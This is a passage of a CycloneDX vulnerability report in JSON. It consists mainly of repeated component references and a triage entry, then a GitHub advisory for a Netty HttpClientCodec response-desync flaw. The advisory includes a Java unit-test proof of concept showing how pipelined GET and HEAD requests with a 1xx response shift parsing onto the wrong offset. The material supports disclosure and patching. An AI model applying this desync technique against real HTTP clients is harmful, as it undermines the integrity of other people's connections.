          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#d5788a09-14a7-4b6f-ac77-4d24acd3d86b"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#d5788a09-14a7-4b6f-ac77-4d24acd3d86b"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#d5788a09-14a7-4b6f-ac77-4d24acd3d86b"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#d5788a09-14a7-4b6f-ac77-4d24acd3d86b"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#d5788a09-14a7-4b6f-ac77-4d24acd3d86b"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#d5788a09-14a7-4b6f-ac77-4d24acd3d86b"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#d5788a09-14a7-4b6f-ac77-4d24acd3d86b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#10584fcb-f875-40c9-9d4d-feec51fde402"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#10584fcb-f875-40c9-9d4d-feec51fde402"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#10584fcb-f875-40c9-9d4d-feec51fde402"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#10584fcb-f875-40c9-9d4d-feec51fde402"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#10584fcb-f875-40c9-9d4d-feec51fde402"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#10584fcb-f875-40c9-9d4d-feec51fde402"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#10584fcb-f875-40c9-9d4d-feec51fde402"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1ed5c1d9-a4fa-4e9b-b526-ac13e5fb0b6c"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1ed5c1d9-a4fa-4e9b-b526-ac13e5fb0b6c"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1ed5c1d9-a4fa-4e9b-b526-ac13e5fb0b6c"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1ed5c1d9-a4fa-4e9b-b526-ac13e5fb0b6c"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1ed5c1d9-a4fa-4e9b-b526-ac13e5fb0b6c"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1ed5c1d9-a4fa-4e9b-b526-ac13e5fb0b6c"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1ed5c1d9-a4fa-4e9b-b526-ac13e5fb0b6c"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#4bc39eb8-ad2c-4883-a769-da510f7e55bf"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#4bc39eb8-ad2c-4883-a769-da510f7e55bf"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#4bc39eb8-ad2c-4883-a769-da510f7e55bf"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#4bc39eb8-ad2c-4883-a769-da510f7e55bf"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#4bc39eb8-ad2c-4883-a769-da510f7e55bf"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#4bc39eb8-ad2c-4883-a769-da510f7e55bf"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#4bc39eb8-ad2c-4883-a769-da510f7e55bf"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#5347721f-3e31-47d4-9910-29d7f97938ea"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#5347721f-3e31-47d4-9910-29d7f97938ea"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#5347721f-3e31-47d4-9910-29d7f97938ea"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#5347721f-3e31-47d4-9910-29d7f97938ea"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#5347721f-3e31-47d4-9910-29d7f97938ea"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#5347721f-3e31-47d4-9910-29d7f97938ea"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#5347721f-3e31-47d4-9910-29d7f97938ea"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#09ebc89d-b1f6-4d6f-905c-b815b6d5ea11"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#09ebc89d-b1f6-4d6f-905c-b815b6d5ea11"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#09ebc89d-b1f6-4d6f-905c-b815b6d5ea11"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#09ebc89d-b1f6-4d6f-905c-b815b6d5ea11"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#09ebc89d-b1f6-4d6f-905c-b815b6d5ea11"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#09ebc89d-b1f6-4d6f-905c-b815b6d5ea11"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#09ebc89d-b1f6-4d6f-905c-b815b6d5ea11"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#2c339f66-608d-4a1a-bd17-3ac026025569"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#2c339f66-608d-4a1a-bd17-3ac026025569"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#2c339f66-608d-4a1a-bd17-3ac026025569"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#2c339f66-608d-4a1a-bd17-3ac026025569"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#2c339f66-608d-4a1a-bd17-3ac026025569"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#2c339f66-608d-4a1a-bd17-3ac026025569"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#2c339f66-608d-4a1a-bd17-3ac026025569"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#dfa2a996-2214-467c-a1cc-1e2d6a896003"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#dfa2a996-2214-467c-a1cc-1e2d6a896003"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#dfa2a996-2214-467c-a1cc-1e2d6a896003"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#dfa2a996-2214-467c-a1cc-1e2d6a896003"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#dfa2a996-2214-467c-a1cc-1e2d6a896003"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#dfa2a996-2214-467c-a1cc-1e2d6a896003"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#dfa2a996-2214-467c-a1cc-1e2d6a896003"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#e25fd335-35a1-4ae5-81e4-5798007b7d78"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#e25fd335-35a1-4ae5-81e4-5798007b7d78"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#e25fd335-35a1-4ae5-81e4-5798007b7d78"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#e25fd335-35a1-4ae5-81e4-5798007b7d78"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#e25fd335-35a1-4ae5-81e4-5798007b7d78"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#e25fd335-35a1-4ae5-81e4-5798007b7d78"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#e25fd335-35a1-4ae5-81e4-5798007b7d78"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#0b07ac1c-1dcb-4b0f-af5e-5488a24932e5"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#0b07ac1c-1dcb-4b0f-af5e-5488a24932e5"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#0b07ac1c-1dcb-4b0f-af5e-5488a24932e5"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#0b07ac1c-1dcb-4b0f-af5e-5488a24932e5"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#0b07ac1c-1dcb-4b0f-af5e-5488a24932e5"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#0b07ac1c-1dcb-4b0f-af5e-5488a24932e5"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#0b07ac1c-1dcb-4b0f-af5e-5488a24932e5"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#71617870-3bd5-40c5-a8f1-c706a789db39"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#71617870-3bd5-40c5-a8f1-c706a789db39"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#71617870-3bd5-40c5-a8f1-c706a789db39"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#71617870-3bd5-40c5-a8f1-c706a789db39"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#71617870-3bd5-40c5-a8f1-c706a789db39"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#71617870-3bd5-40c5-a8f1-c706a789db39"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#71617870-3bd5-40c5-a8f1-c706a789db39"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#20a5067f-330f-4730-82ad-8486276752c9"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#20a5067f-330f-4730-82ad-8486276752c9"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#20a5067f-330f-4730-82ad-8486276752c9"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#20a5067f-330f-4730-82ad-8486276752c9"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#20a5067f-330f-4730-82ad-8486276752c9"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#20a5067f-330f-4730-82ad-8486276752c9"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#20a5067f-330f-4730-82ad-8486276752c9"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#2e46855b-67c7-4e39-95ca-0cfe8b0e6978"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#2e46855b-67c7-4e39-95ca-0cfe8b0e6978"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#2e46855b-67c7-4e39-95ca-0cfe8b0e6978"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#2e46855b-67c7-4e39-95ca-0cfe8b0e6978"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#2e46855b-67c7-4e39-95ca-0cfe8b0e6978"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#2e46855b-67c7-4e39-95ca-0cfe8b0e6978"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#2e46855b-67c7-4e39-95ca-0cfe8b0e6978"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#1a553351-8d22-420d-a952-15539d2c2972"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#1a553351-8d22-420d-a952-15539d2c2972"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#1a553351-8d22-420d-a952-15539d2c2972"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#1a553351-8d22-420d-a952-15539d2c2972"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#1a553351-8d22-420d-a952-15539d2c2972"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#1a553351-8d22-420d-a952-15539d2c2972"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#1a553351-8d22-420d-a952-15539d2c2972"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#1989ed22-39ae-4faf-95a8-b17d75c68eab"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#1989ed22-39ae-4faf-95a8-b17d75c68eab"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#1989ed22-39ae-4faf-95a8-b17d75c68eab"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#1989ed22-39ae-4faf-95a8-b17d75c68eab"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#1989ed22-39ae-4faf-95a8-b17d75c68eab"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#1989ed22-39ae-4faf-95a8-b17d75c68eab"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#1989ed22-39ae-4faf-95a8-b17d75c68eab"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#4be3cc76-79c4-4063-a3e3-da2e35dd27ce"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#4be3cc76-79c4-4063-a3e3-da2e35dd27ce"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#4be3cc76-79c4-4063-a3e3-da2e35dd27ce"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#4be3cc76-79c4-4063-a3e3-da2e35dd27ce"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#4be3cc76-79c4-4063-a3e3-da2e35dd27ce"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#4be3cc76-79c4-4063-a3e3-da2e35dd27ce"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#4be3cc76-79c4-4063-a3e3-da2e35dd27ce"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#b673252a-7c3d-47a1-a0db-fa6cc2e5972c"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#b673252a-7c3d-47a1-a0db-fa6cc2e5972c"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#b673252a-7c3d-47a1-a0db-fa6cc2e5972c"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#b673252a-7c3d-47a1-a0db-fa6cc2e5972c"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#b673252a-7c3d-47a1-a0db-fa6cc2e5972c"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#b673252a-7c3d-47a1-a0db-fa6cc2e5972c"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#b673252a-7c3d-47a1-a0db-fa6cc2e5972c"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#af813fa0-d443-4514-87da-5393748161b0"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#af813fa0-d443-4514-87da-5393748161b0"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#af813fa0-d443-4514-87da-5393748161b0"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#af813fa0-d443-4514-87da-5393748161b0"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#af813fa0-d443-4514-87da-5393748161b0"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#af813fa0-d443-4514-87da-5393748161b0"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#af813fa0-d443-4514-87da-5393748161b0"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#0fbaacfe-6b53-4023-bdd5-af31b72d52a9"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#0fbaacfe-6b53-4023-bdd5-af31b72d52a9"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#0fbaacfe-6b53-4023-bdd5-af31b72d52a9"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#0fbaacfe-6b53-4023-bdd5-af31b72d52a9"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#0fbaacfe-6b53-4023-bdd5-af31b72d52a9"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#0fbaacfe-6b53-4023-bdd5-af31b72d52a9"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#0fbaacfe-6b53-4023-bdd5-af31b72d52a9"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#17d138e3-b096-4715-92f8-210047d6879d"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#17d138e3-b096-4715-92f8-210047d6879d"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#17d138e3-b096-4715-92f8-210047d6879d"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#17d138e3-b096-4715-92f8-210047d6879d"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#17d138e3-b096-4715-92f8-210047d6879d"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#17d138e3-b096-4715-92f8-210047d6879d"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#17d138e3-b096-4715-92f8-210047d6879d"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#5b4a3abf-0c60-4e3f-bcf3-2d49065f3b29"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#5b4a3abf-0c60-4e3f-bcf3-2d49065f3b29"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#5b4a3abf-0c60-4e3f-bcf3-2d49065f3b29"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#5b4a3abf-0c60-4e3f-bcf3-2d49065f3b29"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#5b4a3abf-0c60-4e3f-bcf3-2d49065f3b29"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#5b4a3abf-0c60-4e3f-bcf3-2d49065f3b29"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#5b4a3abf-0c60-4e3f-bcf3-2d49065f3b29"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-42584",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.3,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        }
      ],
      "description": "### Summary\n If HttpClientCodec is configured, there are use cases when a response body from one request, can be parsed as another's.\n\n### Details\nHttpClientCodec pairs each inbound response with an outbound request by `queue.poll()` once per response, including for `1xx`. If the client pipelines GET then HEAD and the server sends 103, then 200 with GET body, then 200 for HEAD, the queue pairs HEAD with the first 200. The HEAD rule then skips reading that message\u2019s body, so the GET entity bytes stay on the stream and the following 200 is parsed from the wrong offset.\n\nPrerequisites \n- HTTP/1.1 pipelining\n- HEAD in the pipeline\n- The server sends 1xx\n\n### PoC\n\n```java\n    @Test\n    public void test() {\n        EmbeddedChannel channel = new EmbeddedChannel(new HttpClientCodec());\n\n        assertTrue(channel.writeOutbound(new DefaultFullHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.GET, \"/1\")));\n        ByteBuf request = channel.readOutbound();\n        request.release();\n        assertNull(channel.readOutbound());\n\n        assertTrue(channel.writeOutbound(new DefaultFullHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.HEAD, \"/2\")));\n        request = channel.readOutbound();\n        request.release();\n        assertNull(channel.readOutbound());\n\n        String responseStr = \"HTTP/1.1 103 Early Hints\\r\\n\\r\\n\" +\n                \"HTTP/1.1 200 OK\\r\\nContent-Length: 5\\r\\n\\r\\nhello\" +\n                \"HTTP/1.1 200 OK\\r\\n\\r\\n\";\n        assertTrue(channel.writeInbound(Unpooled.copiedBuffer(responseStr, CharsetUtil.US_ASCII)));\n\n        // Response 1\n        HttpResponse response = channel.readInbound();\n        assertEquals(HttpResponseStatus.EARLY_HINTS, response.status());\n        LastHttpContent last = channel.readInbound();\n        assertEquals(0, last.content().readableBytes());\n        last.release();\n\n        // Response 2\n        response = channel.readInbound();\n        
assertEquals(HttpResponseStatus.OK, response.status());\n        last = channel.readInbound();\n        assertEquals(0, last.content().readableBytes());\n        last.release();\n\n        // Response 3\n        FullHttpResponse response1 = channel.readInbound();\n        assertTrue(response1.decoderResult().isFailure());\n        assertEquals(0, response1.content().readableBytes());\n        response1.release();\n\n        assertFalse(channel.finish());\n    }\n```\n\n### Impact\nIntegrity/availability of HTTP parsing on that connection, unsafe reuse of the socket.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.13.Final or 4.1.133.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42584"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-57rv-r2g8-2cj3"
        }
      ],
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
